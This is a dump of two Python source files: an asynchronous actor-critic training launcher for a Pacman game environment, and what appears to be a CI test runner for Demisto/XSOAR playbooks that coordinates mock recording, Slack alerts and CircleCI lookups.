from src.optimizer import GlobalRMSProp
from src.process import local_train, local_test
import torch.multiprocessing as _mp
import shutil
def get_args():
parser = argparse.ArgumentParser(
"""Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for Super Mario Bros""")
parser.add_argument("--layout", type=str, default=None)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
parser.add_argument("--num_local_steps", type=int, default=50)
parser.add_argument("--num_global_steps", type=int, default=5e6)
parser.add_argument("--num_processes", type=int, default=2)
parser.add_argument("--save_interval", type=int, default=50, help="Number of steps between savings")
parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros")
parser.add_argument("--saved_path", type=str, default="trained_models")
parser.add_argument("--load_previous_weights", type=bool, default=True,
help="Load weight from previous trained stage")
parser.add_argument("--use_gpu", type=bool, default=True)
args = parser.parse_args()
return args
def train(opt):
torch.manual_seed(123)
if os.path.isdir(opt.log_path):
shutil.rmtree(opt.log_path)
os.makedirs(opt.log_path)
if not os.path.isdir(opt.saved_path):
os.makedirs(opt.saved_path)
mp = _mp.get_context("spawn")
env, num_states, num_actions = create_train_env(opt.layout)
#global_model = ActorCritic(num_states, num_actions)
global_model = AC_NN_MODEL(num_states, num_actions)
if opt.use_gpu:
global_model.cuda()
global_model.share_memory()
if opt.load_previous_weights:
# if opt.stage == 1:
# previous_world = opt.world - 1
# previous_stage = 4
# else:
# previous_world = opt.world
# previous_stage = opt.stage - 1
file_ = "{}/gym-pacman_{}".format(opt.saved_path, opt.layout)
if os.path.isfile(file_):
print("Loading previous weights for %s..." %opt.layout, end=" ")
global_model.load_state_dict(torch.load(file_))
print("Done.")
else:
print("Can't load any previous weights for %s!" %opt.layout)
# print("Loading some other map...", end=" ")
# first_layout = "microGrid_superEasy1"
# file_ = "{}/gym-pacman_{}".format(opt.saved_path, first_layout)
# if os.path.isfile(file_):
# global_model.load_state_dict(torch.load(file_))
# print("Done.")
# else:
# print("Failed.")
#optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
optimizer = GlobalRMSProp(global_model.parameters(), lr=opt.lr)
processes = []
for index in range(opt.num_processes):
# Multiprocessing async agents
if index == 0:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
else:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
process.start()
processes.append(process)
# Local test simulation
#process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
#process.start()
#processes.append(process)
for process in processes:
process.join()
if __name__ == "__main__":
opt = get_args()
train(opt)
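# Example invocation (added as an illustration; the layout name is taken from
# the commented-out code above and must match a layout supported by src.env):
#
#   python train.py --layout microGrid_superEasy1 --num_processes 4 --lr 1e-4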
|
test_content.py
|
from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
import datetime
from distutils.version import LooseVersion
import pytz
from google.cloud import storage
from google.api_core.exceptions import PreconditionFailed
from queue import Queue
from contextlib import contextmanager
import urllib3
import requests
import demisto_client.demisto_api
from demisto_client.demisto_api.rest import ApiException
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
SERVER_URL = "https://{}"
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
"the instance_name argument in conf.json. The options are:\n{}"
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
LOCKS_PATH = 'content-locks'
BUCKET_NAME = os.environ.get('GCS_ARTIFACTS_BUCKET')
CIRCLE_BUILD_NUM = os.environ.get('CIRCLE_BUILD_NUM')
WORKFLOW_ID = os.environ.get('CIRCLE_WORKFLOW_ID')
CIRCLE_STATUS_TOKEN = os.environ.get('CIRCLECI_STATUS_TOKEN')
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
def options_handler():
parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
parser.add_argument('-s', '--server', help='The server URL to connect to')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-e', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
parser.add_argument('-t', '--slack', help='The token for slack', required=True)
parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
parser.add_argument('-g', '--buildName', help='The build name', required=True)
parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
parser.add_argument('-m', '--memCheck', type=str2bool,
help='Should trigger memory checks or not. The slack channel to check the data is: '
'dmst_content_nightly_memory_data', default=False)
parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
'tests on (Valid only when using AMI)', default="NonAMI")
parser.add_argument('-l', '--testsList', help='List of specific, comma separated '
'tests to run')
options = parser.parse_args()
tests_settings = TestsSettings(options)
return tests_settings
class TestsSettings:
def __init__(self, options):
self.api_key = options.apiKey
self.server = options.server
self.conf_path = options.conf
self.secret_conf_path = options.secret
self.nightly = options.nightly
self.slack = options.slack
self.circleci = options.circleci
self.buildNumber = options.buildNumber
self.buildName = options.buildName
self.isAMI = options.isAMI
self.memCheck = options.memCheck
self.serverVersion = options.serverVersion
self.serverNumericVersion = None
self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
self.is_local_run = (self.server is not None)
@staticmethod
def parse_tests_list_arg(tests_list):
tests_to_run = tests_list.split(",") if tests_list else []
return tests_to_run
class PrintJob:
def __init__(self, message_to_print, print_function_to_execute, message_color=None):
self.print_function_to_execute = print_function_to_execute
self.message_to_print = message_to_print
self.message_color = message_color
def execute_print(self):
if self.message_color:
self.print_function_to_execute(self.message_to_print, self.message_color)
else:
self.print_function_to_execute(self.message_to_print)
class ParallelPrintsManager:
def __init__(self, number_of_threads):
self.threads_print_jobs = [[] for i in range(number_of_threads)]
self.print_lock = threading.Lock()
self.threads_last_update_times = [time.time() for i in range(number_of_threads)]
def should_update_thread_status(self, thread_index):
current_time = time.time()
thread_last_update = self.threads_last_update_times[thread_index]
return current_time - thread_last_update > 300
def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
include_timestamp=False):
if include_timestamp:
message_to_print = f'[{datetime.datetime.now(datetime.timezone.utc)}] {message_to_print}'
print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
self.threads_print_jobs[thread_index].append(print_job)
if self.should_update_thread_status(thread_index):
print("Thread {} is still running.".format(thread_index))
self.threads_last_update_times[thread_index] = time.time()
def execute_thread_prints(self, thread_index):
self.print_lock.acquire()
prints_to_execute = self.threads_print_jobs[thread_index]
for print_job in prints_to_execute:
print_job.execute_print()
self.print_lock.release()
self.threads_print_jobs[thread_index] = []
class TestsDataKeeper:
def __init__(self):
self.succeeded_playbooks = []
self.failed_playbooks = []
self.skipped_tests = []
self.skipped_integrations = []
self.rerecorded_tests = []
self.empty_files = []
self.unmockable_integrations = {}
def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
unmockable_integrations):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook in succeed_playbooks:
self.succeeded_playbooks.append(playbook)
for playbook in failed_playbooks:
self.failed_playbooks.append(playbook)
for playbook in skipped_tests:
self.skipped_tests.append(playbook)
for playbook in skipped_integration:
self.skipped_integrations.append(playbook)
for playbook_id, reason in unmockable_integrations.items():
self.unmockable_integrations[playbook_id] = reason
def add_proxy_related_test_data(self, proxy):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook_id in proxy.rerecorded_tests:
self.rerecorded_tests.append(playbook_id)
for playbook_id in proxy.empty_files:
self.empty_files.append(playbook_id)
def print_test_summary(tests_data_keeper, is_ami=True):
succeed_playbooks = tests_data_keeper.succeeded_playbooks
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_tests = tests_data_keeper.skipped_tests
unmocklable_integrations = tests_data_keeper.unmockable_integrations
skipped_integration = tests_data_keeper.skipped_integrations
rerecorded_tests = tests_data_keeper.rerecorded_tests
empty_files = tests_data_keeper.empty_files
succeed_count = len(succeed_playbooks)
failed_count = len(failed_playbooks)
skipped_count = len(skipped_tests)
rerecorded_count = len(rerecorded_tests) if is_ami else 0
empty_mocks_count = len(empty_files) if is_ami else 0
unmocklable_integrations_count = len(unmocklable_integrations)
print('\nTEST RESULTS:')
tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
print(tested_playbooks_message)
succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
if failed_count > 0:
failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
print_error(failed_tests_message)
for playbook_id in failed_playbooks:
print_error('\t - ' + playbook_id)
if rerecorded_count > 0:
recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
print_warning(recording_warning)
for playbook_id in rerecorded_tests:
print_warning('\t - ' + playbook_id)
if empty_mocks_count > 0:
empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
print(empty_mock_successes_msg)
proxy_explanation = '\t (either there were no http requests or no traffic is passed through the proxy.\n' \
'\t Investigate the playbook and the integrations.\n' \
'\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
print(proxy_explanation)
for playbook_id in empty_files:
print('\t - ' + playbook_id)
if len(skipped_integration) > 0:
skipped_integrations_warning = '\t Number of skipped integration - ' + str(len(skipped_integration)) + ':'
print_warning(skipped_integrations_warning)
for playbook_id in skipped_integration:
print_warning('\t - ' + playbook_id)
if skipped_count > 0:
skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
print_warning(skipped_tests_warning)
for playbook_id in skipped_tests:
print_warning('\t - ' + playbook_id)
if unmocklable_integrations_count > 0:
unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
print_warning(unmockable_warning)
for playbook_id, reason in unmocklable_integrations.items():
print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
if integrations:
integrations_names = [integration['name'] for integration in
integrations]
test_message = test_message + ' with integration(s): ' + ','.join(
integrations_names)
return test_message
def turn_off_telemetry(xsoar_client):
"""
Turn off telemetry on the AMI instance
:param xsoar_client: Preconfigured client for the XSOAR instance
:return: None
"""
body, status_code, _ = demisto_client.generic_request_func(self=xsoar_client, method='POST',
path='/telemetry?status=notelemetry')
if status_code != 200:
print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
sys.exit(1)
def reset_containers(server, demisto_user, demisto_pass, prints_manager, thread_index):
prints_manager.add_print_job('Resetting containers', print, thread_index)
client = demisto_client.configure(base_url=server, username=demisto_user, password=demisto_pass, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/containers/reset')
if status_code != 200:
error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
prints_manager.add_print_job(error_msg, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
sys.exit(1)
sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
return list(set(x['name'] for x in integrations).intersection(unmockable_integrations.keys()))
def get_docker_limit():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_processes_data():
process = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_memory_data():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def send_slack_message(slack, channel, text, user_name, as_user):
sc = SlackClient(slack)
sc.api_call(
"chat.postMessage",
channel=channel,
username=user_name,
as_user=as_user,
text=text,
mrkdwn='true'
)
def run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations, playbook_id,
succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, prints_manager, thread_index=0, is_mock_run=False):
with acquire_test_lock(integrations,
test_options.get('timeout'),
prints_manager,
thread_index,
tests_settings.conf_path) as lock:
if lock:
status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run, thread_index=thread_index)
# c.api_client.pool.close()
if status == PB_Status.COMPLETED:
prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
message_color=LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
elif status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
else:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
playbook_id_with_mock = playbook_id
if not is_mock_run:
playbook_id_with_mock += " (Mock Disabled)"
failed_playbooks.append(playbook_id_with_mock)
if not tests_settings.is_local_run:
notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
else:
tests_queue.put(conf_json_test_details)
succeed = False
return succeed
# run the test using a real instance, record traffic.
def run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=0):
proxy.set_tmp_folder()
proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
succeed = run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index, is_mock_run=True)
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if succeed:
proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.set_repo_folder()
return succeed
def mock_run(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, start_message, prints_manager, thread_index=0):
rerecord = False
if proxy.has_mock_file(playbook_id):
start_mock_message = '{} (Mock: Playback)'.format(start_message)
prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
# run test
status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run=True, thread_index=thread_index)
# use results
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if status == PB_Status.COMPLETED:
succeed_message = 'PASS: {} succeed'.format(test_message)
prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.FAILED_DOCKER_TEST:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
failed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
prints_manager.add_print_job(mock_failed_message, print, thread_index)
rerecord = True
else:
mock_recording_message = start_message + ' (Mock: Recording)'
prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
# Mock recording - no mock file or playback failure.
c = demisto_client.configure(base_url=c.api_client.configuration.host,
api_key=c.api_client.configuration.api_key, verify_ssl=False)
succeed = run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks,
integrations, playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server_url, build_name, prints_manager, thread_index=thread_index)
if rerecord and succeed:
proxy.rerecorded_tests.append(playbook_id)
test_end_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(conf_json_test_details, tests_queue, tests_settings, demisto_user, demisto_pass, proxy, failed_playbooks,
integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message, test_options,
slack, circle_ci, build_number, server_url, build_name, prints_manager, is_ami=True, thread_index=0):
start_message = f'------ Test {test_message} start ------'
client = demisto_client.configure(base_url=server_url, username=demisto_user, password=demisto_pass, verify_ssl=False)
if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
run_test_logic(conf_json_test_details, tests_queue, tests_settings, client, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index)
prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
include_timestamp=True)
return
mock_run(conf_json_test_details, tests_queue, tests_settings, client, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, start_message, prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
try:
res = requests.request("GET",
url,
verify=True,
params=params_dict,
)
res.raise_for_status()
return res.json()
except Exception as e:
raise e
def get_user_name_from_circle(circleci_token, build_number):
url = "https://circleci.com/api/v1.1/project/github/demisto/content/{0}?circle-token={1}".format(build_number,
circleci_token)
res = http_request(url)
user_details = res.get('user', {})
return user_details.get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
circle_user_name = get_user_name_from_circle(circle_ci, build_number)
sc = SlackClient(slack)
user_id = retrieve_id(circle_user_name, sc)
text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
if user_id:
sc.api_call(
"chat.postMessage",
channel=user_id,
username="Content CircleCI",
as_user="False",
text=text
)
def retrieve_id(circle_user_name, sc):
user_id = ''
res = sc.api_call('users.list')
user_list = res.get('members', [])
for user in user_list:
profile = user.get('profile', {})
name = profile.get('real_name_normalized', '')
if name == circle_user_name:
user_id = user.get('id', '')
return user_id
def create_result_files(tests_data_keeper):
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_integration = tests_data_keeper.skipped_integrations
skipped_tests = tests_data_keeper.skipped_tests
with open("./Tests/failed_tests.txt", "w") as failed_tests_file:
failed_tests_file.write('\n'.join(failed_playbooks))
with open('./Tests/skipped_tests.txt', "w") as skipped_tests_file:
skipped_tests_file.write('\n'.join(skipped_tests))
with open('./Tests/skipped_integrations.txt', "w") as skipped_integrations_file:
skipped_integrations_file.write('\n'.join(skipped_integration))
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, value)
return json.loads(item_as_string)
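# Illustration (added): with placeholders_map = {'%%SERVER_HOST%%': '10.0.0.1'}
# a config item such as {'url': 'https://%%SERVER_HOST%%:443'} becomes
# {'url': 'https://10.0.0.1:443'}. The '%%SERVER_HOST%%' key mirrors the
# placeholder used in run_test_scenario below; the URL value is hypothetical.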
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
prints_manager, placeholders_map, thread_index=0):
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(integration_params),
integration['name'],
'\n'.join(optional_instance_names))
prints_manager.add_print_job(error_msg, print_error, thread_index)
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
elif integration['name'] == 'Demisto REST API':
integration['params'] = {
'url': 'https://localhost',
'apikey': demisto_api_key,
'insecure': True,
}
return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
integrations = []
is_nightly_integration = False
test_skipped_integration = []
for integration in integrations_conf:
if integration in skipped_integrations_conf.keys():
skipped_integration.add("{0} - reason: {1}".format(integration, skipped_integrations_conf[integration]))
test_skipped_integration.append(integration)
if integration in nightly_integrations:
is_nightly_integration = True
# string description
integrations.append({
'name': integration,
'params': {}
})
return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
if is_nightly:
# TODO: verify this response
return [], False, True
with open(FILTER_CONF, 'r') as filter_file:
filtered_tests = filter_file.readlines()
filtered_tests = [line.strip('\n') for line in filtered_tests]
is_filter_configured = bool(filtered_tests)
run_all = RUN_ALL_TESTS_FORMAT in filtered_tests
return filtered_tests, is_filter_configured, run_all
def load_conf_files(conf_path, secret_conf_path):
with open(conf_path) as data_file:
conf = json.load(data_file)
secret_conf = None
if secret_conf_path:
with open(secret_conf_path) as data_file:
secret_conf = json.load(data_file)
return conf, secret_conf
def run_test_scenario(tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests, skipped_tests, secret_params,
failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_user, demisto_pass, demisto_api_key,
prints_manager, thread_index=0, is_ami=True):
playbook_id = t['playbookID']
nightly_test = t.get('nightly', False)
integrations_conf = t.get('integrations', [])
instance_names_conf = t.get('instance_names', [])
test_message = 'playbook: ' + playbook_id
test_options = {
'timeout': t.get('timeout', default_test_timeout),
'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
}
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf, ]
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf, ]
test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
if playbook_id in filtered_tests:
playbook_skipped_integration.update(test_skipped_integration)
skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
# Skip nightly test
if skip_nightly_test:
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
prints_manager.add_print_job('Skip test', print, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
if not run_all_tests:
# Skip filtered test
if is_filter_configured and playbook_id not in filtered_tests:
return
# Skip bad test
if playbook_id in skipped_tests_conf:
skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
return
# Skip integration
if test_skipped_integration:
return
# Skip version mismatch test
test_from_version = t.get('fromversion', '0.0.0')
test_to_version = t.get('toversion', '99.99.99')
if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
test_from_version,
test_to_version)
prints_manager.add_print_job(warning_message, print_warning, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
placeholders_map = {'%%SERVER_HOST%%': server}
are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
playbook_id, prints_manager, placeholders_map, thread_index=thread_index)
if not are_params_set:
failed_playbooks.append(playbook_id)
return
test_message = update_test_msg(integrations, test_message)
options = options_handler()
stdout, stderr = get_docker_memory_data()
text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
if options.nightly and options.memCheck and not tests_settings.is_local_run:
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
stdout, stderr = get_docker_processes_data()
text = stdout if not stderr else stderr
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
run_test(t, tests_queue, tests_settings, demisto_user, demisto_pass, proxy, failed_playbooks,
integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message,
test_options, slack, circle_ci, build_number, server, build_name, prints_manager,
is_ami, thread_index=thread_index)
def get_server_numeric_version(ami_env, is_local_run=False):
"""
Gets the current server version
Arguments:
ami_env: (str)
AMI version name.
is_local_run: (bool)
when running locally, assume latest version.
Returns:
(str) Server numeric version
"""
default_version = '99.99.98'
env_results_path = './env_results.json'
if is_local_run:
print_color(f'Local run, assuming server version is {default_version}', LOG_COLORS.GREEN)
return default_version
if not os.path.isfile(env_results_path):
print_warning(f'Did not find {env_results_path} file, assuming server version is {default_version}.')
return default_version
with open(env_results_path, 'r') as json_file:
env_results = json.load(json_file)
instances_ami_names = set([env.get('AmiName') for env in env_results if ami_env in env.get('Role', '')])
if len(instances_ami_names) != 1:
print_warning(f'Did not get one AMI Name, got {instances_ami_names}.'
f' Assuming server version is {default_version}')
return default_version
instances_ami_name = list(instances_ami_names)[0]
extracted_version = re.findall(r'Demisto-(?:Circle-CI|MarketPlace)-Content-[\w-]+-([\d.]+)-[\d]{5}',
instances_ami_name)
if extracted_version:
server_numeric_version = extracted_version[0]
else:
server_numeric_version = default_version
# make sure version is three-part version
if server_numeric_version.count('.') == 1:
server_numeric_version += ".0"
print_color(f'Server version: {server_numeric_version}', LOG_COLORS.GREEN)
return server_numeric_version
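# Worked example (added): an AMI named
# 'Demisto-Circle-CI-Content-AllInOne-6.0.0-12345' (a hypothetical name that
# matches the regex above) yields server_numeric_version '6.0.0'; a two-part
# match such as '5.5' would be padded to '5.5.0'.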
def get_instances_ips_and_names(tests_settings):
if tests_settings.server:
return [tests_settings.server]
with open('./Tests/instance_ips.txt', 'r') as instance_file:
instance_ips = instance_file.readlines()
instance_ips = [line.strip('\n').split(":") for line in instance_ips]
return instance_ips
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
test_records_with_supplied_names = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name and test_name in tests_names_to_search:
test_records_with_supplied_names.append(test_record)
return test_records_with_supplied_names
def get_json_file(path):
with open(path, 'r') as json_file:
return json.loads(json_file.read())
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
server = SERVER_URL.format(server_ip)
server_numeric_version = tests_settings.serverNumericVersion
start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
prints_manager.add_print_job(start_message, print, thread_index)
is_nightly = tests_settings.nightly
is_memory_check = tests_settings.memCheck
slack = tests_settings.slack
circle_ci = tests_settings.circleci
build_number = tests_settings.buildNumber
build_name = tests_settings.buildName
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
demisto_api_key = tests_settings.api_key
demisto_user = secret_conf['username']
demisto_pass = secret_conf['userPassword']
default_test_timeout = conf.get('testTimeout', 30)
tests = conf['tests']
skipped_tests_conf = conf['skipped_tests']
nightly_integrations = conf['nightly_integrations']
skipped_integrations_conf = conf['skipped_integrations']
unmockable_integrations = conf['unmockable_integrations']
secret_params = secret_conf['integrations'] if secret_conf else []
filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
if is_filter_configured and not run_all_tests:
is_nightly = True
if not tests or len(tests) == 0:
        prints_manager.add_print_job('no tests are configured', print, thread_index)
prints_manager.execute_thread_prints(thread_index)
return
xsoar_client = demisto_client.configure(base_url=server, username=demisto_user,
password=demisto_pass, verify_ssl=False)
# turn off telemetry
turn_off_telemetry(xsoar_client)
proxy = None
if is_ami:
ami = AMIConnection(server_ip)
ami.clone_mock_data()
